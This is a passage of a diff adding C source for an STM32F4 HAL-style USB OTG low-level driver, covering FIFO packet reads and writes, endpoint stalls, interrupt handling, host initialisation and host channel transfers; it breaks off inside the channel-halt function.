+ ep->xfer_len = ep->maxpacket; + } + + USBx_OUTEP(epnum)->DOEPTSIZ |= (USB_OTG_DOEPTSIZ_PKTCNT & (1U << 19)); + USBx_OUTEP(epnum)->DOEPTSIZ |= (USB_OTG_DOEPTSIZ_XFRSIZ & (ep->maxpacket)); + + if (dma == 1U) + { + if ((uint32_t)ep->xfer_buff != 0U) + { + USBx_OUTEP(epnum)->DOEPDMA = (uint32_t)(ep->xfer_buff); + } + } + + /* EP enable */ + USBx_OUTEP(epnum)->DOEPCTL |= (USB_OTG_DOEPCTL_CNAK | USB_OTG_DOEPCTL_EPENA); + } + + return HAL_OK; +} + +/** + * @brief USB_WritePacket : Writes a packet into the Tx FIFO associated + * with the EP/channel + * @param USBx Selected device + * @param src pointer to source buffer + * @param ch_ep_num endpoint or host channel number + * @param len Number of bytes to write + * @param dma USB dma enabled or disabled + * This parameter can be one of these values: + * 0 : DMA feature not used + * 1 : DMA feature used + * @retval HAL status + */ +HAL_StatusTypeDef USB_WritePacket(USB_OTG_GlobalTypeDef *USBx, uint8_t *src, + uint8_t ch_ep_num, uint16_t len, uint8_t dma) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint8_t *pSrc = src; + uint32_t count32b; + uint32_t i; + + if (dma == 0U) + { + count32b = ((uint32_t)len + 3U) / 4U; + for (i = 0U; i < count32b; i++) + { + USBx_DFIFO((uint32_t)ch_ep_num) = __UNALIGNED_UINT32_READ(pSrc); + pSrc++; + pSrc++; + pSrc++; + pSrc++; + } + } + + return HAL_OK; +} + +/** + * @brief USB_ReadPacket : read a packet from the RX FIFO + * @param USBx Selected device + * @param dest source pointer + * @param len Number of bytes to read + * @retval pointer to destination buffer + */ +void *USB_ReadPacket(USB_OTG_GlobalTypeDef *USBx, uint8_t *dest, uint16_t len) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint8_t *pDest = dest; + uint32_t pData; + uint32_t i; + uint32_t count32b = (uint32_t)len >> 2U; + uint16_t remaining_bytes = len % 4U; + + for (i = 0U; i < count32b; i++) + { + __UNALIGNED_UINT32_WRITE(pDest, USBx_DFIFO(0U)); + pDest++; + pDest++; + pDest++; + pDest++; + } + + /* When Number of data is not word aligned, read the remaining byte */ + if (remaining_bytes != 0U) + { + i = 0U; + __UNALIGNED_UINT32_WRITE(&pData, USBx_DFIFO(0U)); + + do + { + *(uint8_t *)pDest = (uint8_t)(pData >> (8U * (uint8_t)(i))); + i++; + pDest++; + remaining_bytes--; + } while (remaining_bytes != 0U); + } + + return ((void *)pDest); +} + +/** + * @brief USB_EPSetStall : set a stall condition over an EP + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_EPSetStall(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + if (ep->is_in == 1U) + { + if (((USBx_INEP(epnum)->DIEPCTL & USB_OTG_DIEPCTL_EPENA) == 0U) && (epnum != 0U)) + { + USBx_INEP(epnum)->DIEPCTL &= ~(USB_OTG_DIEPCTL_EPDIS); + } + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_STALL; + } + else + { + if (((USBx_OUTEP(epnum)->DOEPCTL & USB_OTG_DOEPCTL_EPENA) == 0U) && (epnum != 0U)) + { + USBx_OUTEP(epnum)->DOEPCTL &= ~(USB_OTG_DOEPCTL_EPDIS); + } + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_STALL; + } + + return HAL_OK; +} + +/** + * @brief USB_EPClearStall : Clear a stall condition over an EP + * @param USBx Selected device + * @param ep pointer to endpoint structure + * @retval HAL status + */ +HAL_StatusTypeDef USB_EPClearStall(USB_OTG_GlobalTypeDef *USBx, USB_OTG_EPTypeDef *ep) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t epnum = (uint32_t)ep->num; + + if (ep->is_in == 1U) + { + USBx_INEP(epnum)->DIEPCTL &= ~USB_OTG_DIEPCTL_STALL; + if ((ep->type == EP_TYPE_INTR) || (ep->type == EP_TYPE_BULK)) + { + USBx_INEP(epnum)->DIEPCTL |= USB_OTG_DIEPCTL_SD0PID_SEVNFRM; /* DATA0 */ + } + } + else + { + USBx_OUTEP(epnum)->DOEPCTL &= ~USB_OTG_DOEPCTL_STALL; + if ((ep->type == EP_TYPE_INTR) || (ep->type == EP_TYPE_BULK)) + { + USBx_OUTEP(epnum)->DOEPCTL |= USB_OTG_DOEPCTL_SD0PID_SEVNFRM; /* DATA0 */ + } + } + return HAL_OK; +} + +/** + * @brief USB_StopDevice : Stop the usb device mode + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_StopDevice(USB_OTG_GlobalTypeDef *USBx) +{ + HAL_StatusTypeDef ret; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t i; + + /* Clear Pending interrupt */ + for (i = 0U; i < 15U; i++) + { + USBx_INEP(i)->DIEPINT = 0xFB7FU; + USBx_OUTEP(i)->DOEPINT = 0xFB7FU; + } + + /* Clear interrupt masks */ + USBx_DEVICE->DIEPMSK = 0U; + USBx_DEVICE->DOEPMSK = 0U; + USBx_DEVICE->DAINTMSK = 0U; + + /* Flush the FIFO */ + ret = USB_FlushRxFifo(USBx); + if (ret != HAL_OK) + { + return ret; + } + + ret = USB_FlushTxFifo(USBx, 0x10U); + if (ret != HAL_OK) + { + return ret; + } + + return ret; +} + +/** + * @brief USB_SetDevAddress : Stop the usb device mode + * @param USBx Selected device + * @param address new device address to be assigned + * This parameter can be a value from 0 to 255 + * @retval HAL status + */ +HAL_StatusTypeDef USB_SetDevAddress(USB_OTG_GlobalTypeDef *USBx, uint8_t address) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + USBx_DEVICE->DCFG &= ~(USB_OTG_DCFG_DAD); + USBx_DEVICE->DCFG |= ((uint32_t)address << 4) & USB_OTG_DCFG_DAD; + + return HAL_OK; +} + +/** + * @brief USB_DevConnect : Connect the USB device by enabling Rpu + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_DevConnect(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + /* In case phy is stopped, ensure to ungate and restore the phy CLK */ + USBx_PCGCCTL &= ~(USB_OTG_PCGCCTL_STOPCLK | USB_OTG_PCGCCTL_GATECLK); + + USBx_DEVICE->DCTL &= ~USB_OTG_DCTL_SDIS; + + return HAL_OK; +} + +/** + * @brief USB_DevDisconnect : Disconnect the USB device by disabling Rpu + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_DevDisconnect(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + /* In case phy is stopped, ensure to ungate and restore the phy CLK */ + USBx_PCGCCTL &= ~(USB_OTG_PCGCCTL_STOPCLK | USB_OTG_PCGCCTL_GATECLK); + + USBx_DEVICE->DCTL |= USB_OTG_DCTL_SDIS; + + return HAL_OK; +} + +/** + * @brief USB_ReadInterrupts: return the global USB interrupt status + * @param USBx Selected device + * @retval HAL status + */ +uint32_t USB_ReadInterrupts(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t tmpreg; + + tmpreg = USBx->GINTSTS; + tmpreg &= USBx->GINTMSK; + + return tmpreg; +} + +/** + * @brief USB_ReadDevAllOutEpInterrupt: return the USB device OUT endpoints interrupt status + * @param USBx Selected device + * @retval HAL status + */ +uint32_t USB_ReadDevAllOutEpInterrupt(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t tmpreg; + + tmpreg = USBx_DEVICE->DAINT; + tmpreg &= USBx_DEVICE->DAINTMSK; + + return ((tmpreg & 0xffff0000U) >> 16); +} + +/** + * @brief USB_ReadDevAllInEpInterrupt: return the USB device IN endpoints interrupt status + * @param USBx Selected device + * @retval HAL status + */ +uint32_t USB_ReadDevAllInEpInterrupt(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t tmpreg; + + tmpreg = USBx_DEVICE->DAINT; + tmpreg &= USBx_DEVICE->DAINTMSK; + + return ((tmpreg & 0xFFFFU)); +} + +/** + * @brief Returns Device OUT EP Interrupt register + * @param USBx Selected device + * @param epnum endpoint number + * This parameter can be a value from 0 to 15 + * @retval Device OUT EP Interrupt register + */ +uint32_t USB_ReadDevOutEPInterrupt(USB_OTG_GlobalTypeDef *USBx, uint8_t epnum) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t tmpreg; + + tmpreg = USBx_OUTEP((uint32_t)epnum)->DOEPINT; + tmpreg &= USBx_DEVICE->DOEPMSK; + + return tmpreg; +} + +/** + * @brief Returns Device IN EP Interrupt register + * @param USBx Selected device + * @param epnum endpoint number + * This parameter can be a value from 0 to 15 + * @retval Device IN EP Interrupt register + */ +uint32_t USB_ReadDevInEPInterrupt(USB_OTG_GlobalTypeDef *USBx, uint8_t epnum) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t tmpreg; + uint32_t msk; + uint32_t emp; + + msk = USBx_DEVICE->DIEPMSK; + emp = USBx_DEVICE->DIEPEMPMSK; + msk |= ((emp >> (epnum & EP_ADDR_MSK)) & 0x1U) << 7; + tmpreg = USBx_INEP((uint32_t)epnum)->DIEPINT & msk; + + return tmpreg; +} + +/** + * @brief USB_ClearInterrupts: clear a USB interrupt + * @param USBx Selected device + * @param interrupt flag + * @retval None + */ +void USB_ClearInterrupts(USB_OTG_GlobalTypeDef *USBx, uint32_t interrupt) +{ + USBx->GINTSTS |= interrupt; +} + +/** + * @brief Returns USB core mode + * @param USBx Selected device + * @retval return core mode : Host or Device + * This parameter can be one of these values: + * 0 : Host + * 1 : Device + */ +uint32_t USB_GetMode(USB_OTG_GlobalTypeDef *USBx) +{ + return ((USBx->GINTSTS) & 0x1U); +} + +/** + * @brief Activate EP0 for Setup transactions + * @param USBx Selected device + * @retval HAL status + */ +HAL_StatusTypeDef USB_ActivateSetup(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + /* Set the MPS of the IN EP0 to 64 bytes */ + USBx_INEP(0U)->DIEPCTL &= ~USB_OTG_DIEPCTL_MPSIZ; + + USBx_DEVICE->DCTL |= USB_OTG_DCTL_CGINAK; + + return HAL_OK; +} + +/** + * @brief Prepare the EP0 to start the first control setup + * @param USBx Selected device + * @param dma USB dma enabled or disabled + * This parameter can be one of these values: + * 0 : DMA feature not used + * 1 : DMA feature used + * @param psetup pointer to setup packet + * @retval HAL status + */ +HAL_StatusTypeDef USB_EP0_OutStart(USB_OTG_GlobalTypeDef *USBx, uint8_t dma, uint8_t *psetup) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t gSNPSiD = *(__IO uint32_t *)(&USBx->CID + 0x1U); + + if (gSNPSiD > USB_OTG_CORE_ID_300A) + { + if ((USBx_OUTEP(0U)->DOEPCTL & USB_OTG_DOEPCTL_EPENA) == USB_OTG_DOEPCTL_EPENA) + { + return HAL_OK; + } + } + + USBx_OUTEP(0U)->DOEPTSIZ = 0U; + USBx_OUTEP(0U)->DOEPTSIZ |= (USB_OTG_DOEPTSIZ_PKTCNT & (1U << 19)); + USBx_OUTEP(0U)->DOEPTSIZ |= (3U * 8U); + USBx_OUTEP(0U)->DOEPTSIZ |= USB_OTG_DOEPTSIZ_STUPCNT; + + if (dma == 1U) + { + USBx_OUTEP(0U)->DOEPDMA = (uint32_t)psetup; + /* EP enable */ + USBx_OUTEP(0U)->DOEPCTL |= USB_OTG_DOEPCTL_EPENA | USB_OTG_DOEPCTL_USBAEP; + } + + return HAL_OK; +} + +/** + * @brief Reset the USB Core (needed after USB clock settings change) + * @param USBx Selected device + * @retval HAL status + */ +static HAL_StatusTypeDef USB_CoreReset(USB_OTG_GlobalTypeDef *USBx) +{ + __IO uint32_t count = 0U; + + /* Wait for AHB master IDLE state. */ + do + { + if (++count > 200000U) + { + return HAL_TIMEOUT; + } + } while ((USBx->GRSTCTL & USB_OTG_GRSTCTL_AHBIDL) == 0U); + + /* Core Soft Reset */ + count = 0U; + USBx->GRSTCTL |= USB_OTG_GRSTCTL_CSRST; + + do + { + if (++count > 200000U) + { + return HAL_TIMEOUT; + } + } while ((USBx->GRSTCTL & USB_OTG_GRSTCTL_CSRST) == USB_OTG_GRSTCTL_CSRST); + + return HAL_OK; +} + +/** + * @brief USB_HostInit : Initializes the USB OTG controller registers + * for Host mode + * @param USBx Selected device + * @param cfg pointer to a USB_OTG_CfgTypeDef structure that contains + * the configuration information for the specified USBx peripheral. + * @retval HAL status + */ +HAL_StatusTypeDef USB_HostInit(USB_OTG_GlobalTypeDef *USBx, USB_OTG_CfgTypeDef cfg) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t i; + + /* Restart the Phy Clock */ + USBx_PCGCCTL = 0U; + +#if defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Disable HW VBUS sensing */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_VBDEN); +#else + /* + * Disable HW VBUS sensing. VBUS is internally considered to be always + * at VBUS-Valid level (5V). + */ + USBx->GCCFG |= USB_OTG_GCCFG_NOVBUSSENS; + USBx->GCCFG &= ~USB_OTG_GCCFG_VBUSBSEN; + USBx->GCCFG &= ~USB_OTG_GCCFG_VBUSASEN; +#endif /* defined(STM32F446xx) || defined(STM32F469xx) || defined(STM32F479xx) || defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) + /* Disable Battery chargin detector */ + USBx->GCCFG &= ~(USB_OTG_GCCFG_BCDEN); +#endif /* defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) */ + + if ((USBx->CID & (0x1U << 8)) != 0U) + { + if (cfg.speed == USBH_FSLS_SPEED) + { + /* Force Device Enumeration to FS/LS mode only */ + USBx_HOST->HCFG |= USB_OTG_HCFG_FSLSS; + } + else + { + /* Set default Max speed support */ + USBx_HOST->HCFG &= ~(USB_OTG_HCFG_FSLSS); + } + } + else + { + /* Set default Max speed support */ + USBx_HOST->HCFG &= ~(USB_OTG_HCFG_FSLSS); + } + + /* Make sure the FIFOs are flushed. */ + (void)USB_FlushTxFifo(USBx, 0x10U); /* all Tx FIFOs */ + (void)USB_FlushRxFifo(USBx); + + /* Clear all pending HC Interrupts */ + for (i = 0U; i < cfg.Host_channels; i++) + { + USBx_HC(i)->HCINT = 0xFFFFFFFFU; + USBx_HC(i)->HCINTMSK = 0U; + } + + /* Disable all interrupts. */ + USBx->GINTMSK = 0U; + + /* Clear any pending interrupts */ + USBx->GINTSTS = 0xFFFFFFFFU; + + if ((USBx->CID & (0x1U << 8)) != 0U) + { + /* set Rx FIFO size */ + USBx->GRXFSIZ = 0x200U; + USBx->DIEPTXF0_HNPTXFSIZ = (uint32_t)(((0x100U << 16) & USB_OTG_NPTXFD) | 0x200U); + USBx->HPTXFSIZ = (uint32_t)(((0xE0U << 16) & USB_OTG_HPTXFSIZ_PTXFD) | 0x300U); + } + else + { + /* set Rx FIFO size */ + USBx->GRXFSIZ = 0x80U; + USBx->DIEPTXF0_HNPTXFSIZ = (uint32_t)(((0x60U << 16) & USB_OTG_NPTXFD) | 0x80U); + USBx->HPTXFSIZ = (uint32_t)(((0x40U << 16)& USB_OTG_HPTXFSIZ_PTXFD) | 0xE0U); + } + + /* Enable the common interrupts */ + if (cfg.dma_enable == 0U) + { + USBx->GINTMSK |= USB_OTG_GINTMSK_RXFLVLM; + } + + /* Enable interrupts matching to the Host mode ONLY */ + USBx->GINTMSK |= (USB_OTG_GINTMSK_PRTIM | USB_OTG_GINTMSK_HCIM | \ + USB_OTG_GINTMSK_SOFM | USB_OTG_GINTSTS_DISCINT | \ + USB_OTG_GINTMSK_PXFRM_IISOOXFRM | USB_OTG_GINTMSK_WUIM); + + return HAL_OK; +} + +/** + * @brief USB_InitFSLSPClkSel : Initializes the FSLSPClkSel field of the + * HCFG register on the PHY type and set the right frame interval + * @param USBx Selected device + * @param freq clock frequency + * This parameter can be one of these values: + * HCFG_48_MHZ : Full Speed 48 MHz Clock + * HCFG_6_MHZ : Low Speed 6 MHz Clock + * @retval HAL status + */ +HAL_StatusTypeDef USB_InitFSLSPClkSel(USB_OTG_GlobalTypeDef *USBx, uint8_t freq) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + USBx_HOST->HCFG &= ~(USB_OTG_HCFG_FSLSPCS); + USBx_HOST->HCFG |= (uint32_t)freq & USB_OTG_HCFG_FSLSPCS; + + if (freq == HCFG_48_MHZ) + { + USBx_HOST->HFIR = 48000U; + } + else if (freq == HCFG_6_MHZ) + { + USBx_HOST->HFIR = 6000U; + } + else + { + /* ... */ + } + + return HAL_OK; +} + +/** + * @brief USB_OTG_ResetPort : Reset Host Port + * @param USBx Selected device + * @retval HAL status + * @note (1)The application must wait at least 10 ms + * before clearing the reset bit. + */ +HAL_StatusTypeDef USB_ResetPort(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + __IO uint32_t hprt0 = 0U; + + hprt0 = USBx_HPRT0; + + hprt0 &= ~(USB_OTG_HPRT_PENA | USB_OTG_HPRT_PCDET | + USB_OTG_HPRT_PENCHNG | USB_OTG_HPRT_POCCHNG); + + USBx_HPRT0 = (USB_OTG_HPRT_PRST | hprt0); + HAL_Delay(100U); /* See Note #1 */ + USBx_HPRT0 = ((~USB_OTG_HPRT_PRST) & hprt0); + HAL_Delay(10U); + + return HAL_OK; +} + +/** + * @brief USB_DriveVbus : activate or de-activate vbus + * @param state VBUS state + * This parameter can be one of these values: + * 0 : Deactivate VBUS + * 1 : Activate VBUS + * @retval HAL status + */ +HAL_StatusTypeDef USB_DriveVbus(USB_OTG_GlobalTypeDef *USBx, uint8_t state) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + __IO uint32_t hprt0 = 0U; + + hprt0 = USBx_HPRT0; + + hprt0 &= ~(USB_OTG_HPRT_PENA | USB_OTG_HPRT_PCDET | + USB_OTG_HPRT_PENCHNG | USB_OTG_HPRT_POCCHNG); + + if (((hprt0 & USB_OTG_HPRT_PPWR) == 0U) && (state == 1U)) + { + USBx_HPRT0 = (USB_OTG_HPRT_PPWR | hprt0); + } + if (((hprt0 & USB_OTG_HPRT_PPWR) == USB_OTG_HPRT_PPWR) && (state == 0U)) + { + USBx_HPRT0 = ((~USB_OTG_HPRT_PPWR) & hprt0); + } + return HAL_OK; +} + +/** + * @brief Return Host Core speed + * @param USBx Selected device + * @retval speed : Host speed + * This parameter can be one of these values: + * @arg HCD_SPEED_HIGH: High speed mode + * @arg HCD_SPEED_FULL: Full speed mode + * @arg HCD_SPEED_LOW: Low speed mode + */ +uint32_t USB_GetHostSpeed(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + __IO uint32_t hprt0 = 0U; + + hprt0 = USBx_HPRT0; + return ((hprt0 & USB_OTG_HPRT_PSPD) >> 17); +} + +/** + * @brief Return Host Current Frame number + * @param USBx Selected device + * @retval current frame number + */ +uint32_t USB_GetCurrentFrame(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + return (USBx_HOST->HFNUM & USB_OTG_HFNUM_FRNUM); +} + +/** + * @brief Initialize a host channel + * @param USBx Selected device + * @param ch_num Channel number + * This parameter can be a value from 1 to 15 + * @param epnum Endpoint number + * This parameter can be a value from 1 to 15 + * @param dev_address Current device address + * This parameter can be a value from 0 to 255 + * @param speed Current device speed + * This parameter can be one of these values: + * @arg USB_OTG_SPEED_HIGH: High speed mode + * @arg USB_OTG_SPEED_FULL: Full speed mode + * @arg USB_OTG_SPEED_LOW: Low speed mode + * @param ep_type Endpoint Type + * This parameter can be one of these values: + * @arg EP_TYPE_CTRL: Control type + * @arg EP_TYPE_ISOC: Isochronous type + * @arg EP_TYPE_BULK: Bulk type + * @arg EP_TYPE_INTR: Interrupt type + * @param mps Max Packet Size + * This parameter can be a value from 0 to 32K + * @retval HAL state + */ +HAL_StatusTypeDef USB_HC_Init(USB_OTG_GlobalTypeDef *USBx, uint8_t ch_num, + uint8_t epnum, uint8_t dev_address, uint8_t speed, + uint8_t ep_type, uint16_t mps) +{ + HAL_StatusTypeDef ret = HAL_OK; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t HCcharEpDir; + uint32_t HCcharLowSpeed; + uint32_t HostCoreSpeed; + + /* Clear old interrupt conditions for this host channel. */ + USBx_HC((uint32_t)ch_num)->HCINT = 0xFFFFFFFFU; + + /* Enable channel interrupts required for this transfer. */ + switch (ep_type) + { + case EP_TYPE_CTRL: + case EP_TYPE_BULK: + USBx_HC((uint32_t)ch_num)->HCINTMSK = USB_OTG_HCINTMSK_XFRCM | + USB_OTG_HCINTMSK_STALLM | + USB_OTG_HCINTMSK_TXERRM | + USB_OTG_HCINTMSK_DTERRM | + USB_OTG_HCINTMSK_AHBERR | + USB_OTG_HCINTMSK_NAKM; + + if ((epnum & 0x80U) == 0x80U) + { + USBx_HC((uint32_t)ch_num)->HCINTMSK |= USB_OTG_HCINTMSK_BBERRM; + } + else + { + if ((USBx->CID & (0x1U << 8)) != 0U) + { + USBx_HC((uint32_t)ch_num)->HCINTMSK |= USB_OTG_HCINTMSK_NYET | + USB_OTG_HCINTMSK_ACKM; + } + } + break; + + case EP_TYPE_INTR: + USBx_HC((uint32_t)ch_num)->HCINTMSK = USB_OTG_HCINTMSK_XFRCM | + USB_OTG_HCINTMSK_STALLM | + USB_OTG_HCINTMSK_TXERRM | + USB_OTG_HCINTMSK_DTERRM | + USB_OTG_HCINTMSK_NAKM | + USB_OTG_HCINTMSK_AHBERR | + USB_OTG_HCINTMSK_FRMORM; + + if ((epnum & 0x80U) == 0x80U) + { + USBx_HC((uint32_t)ch_num)->HCINTMSK |= USB_OTG_HCINTMSK_BBERRM; + } + + break; + + case EP_TYPE_ISOC: + USBx_HC((uint32_t)ch_num)->HCINTMSK = USB_OTG_HCINTMSK_XFRCM | + USB_OTG_HCINTMSK_ACKM | + USB_OTG_HCINTMSK_AHBERR | + USB_OTG_HCINTMSK_FRMORM; + + if ((epnum & 0x80U) == 0x80U) + { + USBx_HC((uint32_t)ch_num)->HCINTMSK |= (USB_OTG_HCINTMSK_TXERRM | USB_OTG_HCINTMSK_BBERRM); + } + break; + + default: + ret = HAL_ERROR; + break; + } + + /* Enable the top level host channel interrupt. */ + USBx_HOST->HAINTMSK |= 1UL << (ch_num & 0xFU); + + /* Make sure host channel interrupts are enabled. */ + USBx->GINTMSK |= USB_OTG_GINTMSK_HCIM; + + /* Program the HCCHAR register */ + if ((epnum & 0x80U) == 0x80U) + { + HCcharEpDir = (0x1U << 15) & USB_OTG_HCCHAR_EPDIR; + } + else + { + HCcharEpDir = 0U; + } + + HostCoreSpeed = USB_GetHostSpeed(USBx); + + /* LS device plugged to HUB */ + if ((speed == HPRT0_PRTSPD_LOW_SPEED) && (HostCoreSpeed != HPRT0_PRTSPD_LOW_SPEED)) + { + HCcharLowSpeed = (0x1U << 17) & USB_OTG_HCCHAR_LSDEV; + } + else + { + HCcharLowSpeed = 0U; + } + + USBx_HC((uint32_t)ch_num)->HCCHAR = (((uint32_t)dev_address << 22) & USB_OTG_HCCHAR_DAD) | + ((((uint32_t)epnum & 0x7FU) << 11) & USB_OTG_HCCHAR_EPNUM) | + (((uint32_t)ep_type << 18) & USB_OTG_HCCHAR_EPTYP) | + ((uint32_t)mps & USB_OTG_HCCHAR_MPSIZ) | HCcharEpDir | HCcharLowSpeed; + + if (ep_type == EP_TYPE_INTR) + { + USBx_HC((uint32_t)ch_num)->HCCHAR |= USB_OTG_HCCHAR_ODDFRM ; + } + + return ret; +} + +/** + * @brief Start a transfer over a host channel + * @param USBx Selected device + * @param hc pointer to host channel structure + * @param dma USB dma enabled or disabled + * This parameter can be one of these values: + * 0 : DMA feature not used + * 1 : DMA feature used + * @retval HAL state + */ +HAL_StatusTypeDef USB_HC_StartXfer(USB_OTG_GlobalTypeDef *USBx, USB_OTG_HCTypeDef *hc, uint8_t dma) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t ch_num = (uint32_t)hc->ch_num; + __IO uint32_t tmpreg; + uint8_t is_oddframe; + uint16_t len_words; + uint16_t num_packets; + uint16_t max_hc_pkt_count = 256U; + + if (((USBx->CID & (0x1U << 8)) != 0U) && (hc->speed == USBH_HS_SPEED)) + { + /* in DMA mode host Core automatically issues ping in case of NYET/NAK */ + if ((dma == 1U) && ((hc->ep_type == EP_TYPE_CTRL) || (hc->ep_type == EP_TYPE_BULK))) + { + USBx_HC((uint32_t)ch_num)->HCINTMSK &= ~(USB_OTG_HCINTMSK_NYET | + USB_OTG_HCINTMSK_ACKM | + USB_OTG_HCINTMSK_NAKM); + } + + if ((dma == 0U) && (hc->do_ping == 1U)) + { + (void)USB_DoPing(USBx, hc->ch_num); + return HAL_OK; + } + + } + + /* Compute the expected number of packets associated to the transfer */ + if (hc->xfer_len > 0U) + { + num_packets = (uint16_t)((hc->xfer_len + hc->max_packet - 1U) / hc->max_packet); + + if (num_packets > max_hc_pkt_count) + { + num_packets = max_hc_pkt_count; + hc->XferSize = (uint32_t)num_packets * hc->max_packet; + } + } + else + { + num_packets = 1U; + } + + /* + * For IN channel HCTSIZ.XferSize is expected to be an integer multiple of + * max_packet size. + */ + if (hc->ep_is_in != 0U) + { + hc->XferSize = (uint32_t)num_packets * hc->max_packet; + } + else + { + hc->XferSize = hc->xfer_len; + } + + /* Initialize the HCTSIZn register */ + USBx_HC(ch_num)->HCTSIZ = (hc->XferSize & USB_OTG_HCTSIZ_XFRSIZ) | + (((uint32_t)num_packets << 19) & USB_OTG_HCTSIZ_PKTCNT) | + (((uint32_t)hc->data_pid << 29) & USB_OTG_HCTSIZ_DPID); + + if (dma != 0U) + { + /* xfer_buff MUST be 32-bits aligned */ + USBx_HC(ch_num)->HCDMA = (uint32_t)hc->xfer_buff; + } + + is_oddframe = (((uint32_t)USBx_HOST->HFNUM & 0x01U) != 0U) ? 0U : 1U; + USBx_HC(ch_num)->HCCHAR &= ~USB_OTG_HCCHAR_ODDFRM; + USBx_HC(ch_num)->HCCHAR |= (uint32_t)is_oddframe << 29; + + /* Set host channel enable */ + tmpreg = USBx_HC(ch_num)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + + /* make sure to set the correct ep direction */ + if (hc->ep_is_in != 0U) + { + tmpreg |= USB_OTG_HCCHAR_EPDIR; + } + else + { + tmpreg &= ~USB_OTG_HCCHAR_EPDIR; + } + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(ch_num)->HCCHAR = tmpreg; + + if (dma != 0U) /* dma mode */ + { + return HAL_OK; + } + + if ((hc->ep_is_in == 0U) && (hc->xfer_len > 0U)) + { + switch (hc->ep_type) + { + /* Non periodic transfer */ + case EP_TYPE_CTRL: + case EP_TYPE_BULK: + + len_words = (uint16_t)((hc->xfer_len + 3U) / 4U); + + /* check if there is enough space in FIFO space */ + if (len_words > (USBx->HNPTXSTS & 0xFFFFU)) + { + /* need to process data in nptxfempty interrupt */ + USBx->GINTMSK |= USB_OTG_GINTMSK_NPTXFEM; + } + break; + + /* Periodic transfer */ + case EP_TYPE_INTR: + case EP_TYPE_ISOC: + len_words = (uint16_t)((hc->xfer_len + 3U) / 4U); + /* check if there is enough space in FIFO space */ + if (len_words > (USBx_HOST->HPTXSTS & 0xFFFFU)) /* split the transfer */ + { + /* need to process data in ptxfempty interrupt */ + USBx->GINTMSK |= USB_OTG_GINTMSK_PTXFEM; + } + break; + + default: + break; + } + + /* Write packet into the Tx FIFO. */ + (void)USB_WritePacket(USBx, hc->xfer_buff, hc->ch_num, (uint16_t)hc->xfer_len, 0); + } + + return HAL_OK; +} + +/** + * @brief Read all host channel interrupts status + * @param USBx Selected device + * @retval HAL state + */ +uint32_t USB_HC_ReadInterrupt(USB_OTG_GlobalTypeDef *USBx) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + + return ((USBx_HOST->HAINT) & 0xFFFFU); +} + +/** + * @brief Halt a host channel + * @param USBx Selected device + * @param hc_num Host Channel number + * This parameter can be a value from 1 to 15 + * @retval HAL state + */ +HAL_StatusTypeDef USB_HC_Halt(USB_OTG_GlobalTypeDef *USBx, uint8_t hc_num) +{ + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t hcnum = (uint32_t)hc_num; + uint32_t count = 0U; + uint32_t HcEpType = (USBx_HC(hcnum)->HCCHAR & USB_OTG_HCCHAR_EPTYP) >> 18; + uint32_t ChannelEna = (USBx_HC(hcnum)->HCCHAR & USB_OTG_HCCHAR_CHENA) >> 31; + + if (((USBx->GAHBCFG & USB_OTG_GAHBCFG_DMAEN) == USB_OTG_GAHBCFG_DMAEN) && + (ChannelEna == 0U)) + { + return HAL_OK; + } + + /* Check for space in the request queue to issue the halt. */ + if ((HcEpType == HCCHAR_CTRL) || (HcEpType == HCCHAR_BULK)) + { + USBx_HC(hcnum)->HCCHAR |= USB_OTG_HCCHAR_CHDIS; + + if 